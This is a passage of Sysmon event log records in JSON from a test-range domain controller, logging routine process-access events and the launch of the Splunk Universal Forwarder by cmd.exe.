C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1682,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1683,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1684,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1685,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1686,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1687,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-00103F670300}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-00103F670300}","TargetProcessId":"3916","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1688,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.792\r\nProcessGuid: {41C8662E-1F74-5F25-0000-0010FC670300}\r\nProcessId: 3928\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {41C8662E-1F74-5F25-0000-00103F670300}\r\nParentProcessId: 3916\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.792","ProcessGuid":"{41C8662E-1F74-5F25-0000-0010FC670300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{41C8662E-1F74-5F25-0000-00103F670300}","ParentProcessId":"3916","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1689,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-00103F670300}\r\nSourceProcessId: 3916\r\nSourceThreadId: 3920\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010FC670300}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-00103F670300}","SourceProcessId":"3916","SourceThreadId":"3920","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010FC670300}","TargetProcessId":"3928","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
